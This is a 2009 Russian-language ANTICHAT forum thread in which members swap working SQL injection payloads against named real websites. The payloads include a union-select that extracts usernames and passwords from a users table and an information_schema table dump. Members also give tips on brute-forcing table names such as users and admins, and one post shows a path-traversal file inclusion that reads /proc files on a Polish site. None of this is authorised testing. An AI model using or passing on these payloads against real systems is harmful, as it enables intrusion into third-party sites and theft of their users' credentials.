ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

16.06.2009, 16:16
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Сообщение от AlexSatter
4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+sub string(version(),1,1)=4
p.s. раскручивайте её как слепую, имхо.
Подзапросами, которых в этой версии нету?
Попробуй покрутить скуль в другом месте.
Последний раз редактировалось R1dex; 16.06.2009 в 16:20..
|
|
|

16.06.2009, 21:09
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме: 791766
Репутация:
61
|
|
Сообщение от Iceangel_
2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40
Не проходит я же написал помойму
|
|
|

16.06.2009, 22:12
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
подскажите плиз как дораскрутить....4* всегда вызывает у меня проблемы..., если можно, то с небольшими разъяснениями( Ососбенно как подобрать имена таблиц и колонок) вот до чего дошел я(до принтаьельной колонке):
http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,5,6,7--
|
|
|

16.06.2009, 22:22
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме: 1191962
Репутация:
39
|
|
http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,concat_ws(char(58),username ,password),6,7+from+users--
дальше сам подбирай другие колонки и таблици...
Последний раз редактировалось Adm1n4eG; 16.06.2009 в 22:28..
|
|
|

16.06.2009, 23:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Код:
ttp://times.ua/search/results/?keyword=1'
Это инъекция?
|
|
|

16.06.2009, 23:40
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
Сообщение от jecka3000
Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
Acunetix Web Vulnerability Scanner 6.x, Core Impact 7.5
Мошнее я не видел еще
|
|
|

16.06.2009, 23:51
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме: 14324684
Репутация:
3908
|
|
Сообщение от mailbrush
Код:
ttp://times.ua/search/results/?keyword=1'
Это инъекция?
Да
Код:
http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+from+information_schema.tables--+
5 ветка и вывод очень удобный, вся инфа сразу на одной странице.
__________________
Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 16.06.2009 в 23:55..
|
|
|

17.06.2009, 08:22
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме: 1168802
Репутация:
298
|
|
jecka3000
в 4-х скулях подбор таблиц и колонок происходит подбором. Здесь это написано
https://forum.antichat.ru/threadnav43966-1-10.html
для автоматизации (брутфорс таблиц,колонок из словоря), можно использоваться SIPT4
что касается таблиц, в первую очередь следует проверять такие как: user, users,admin,admins,member,members,accounts,profile s,etc (если конечно, Вас интересуют эти данные  )
Последний раз редактировалось AlexSatter; 17.06.2009 в 08:34..
|
|
|

17.06.2009, 09:43
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Сообщение от Ded MustD!e
Да
Код:
http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+from+information_schema.tables--+
5 ветка и вывод очень удобный, вся инфа сразу на одной странице.
Спасибо. Я пробовал подставлять так - http://times.ua/search/results/?keyword=1'/*, т.е. отсечь все лишнее, но ошибка выводилась, поэтому и не подбирал.
|
|
|

17.06.2009, 10:13
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Хочу понять как искать логи апача через
К примеру
http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../proc/self/status%00
Name: httpd2-prefork State: R (running) SleepAVG: 88% Tgid: 14786 Pid: 14786 PPid: 5965 TracerPid: 0 Uid: 30 30 30 30 Gid: 260 260 260 260 FDSize: 64 Groups: 260 VmPeak: 148096 kB
Pid: 14786 - но при каждом обновлении страницы он меняется.
http://www.amp.edu.pl/eng/index.php?strona=../../../../../../../../proc/14786/fd/7%00
Выдаёт что такого файла нет (%{FD_ID} - пробовал менять).
Напишите эксплуатацию этой техники поподробней, пожалуйста
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|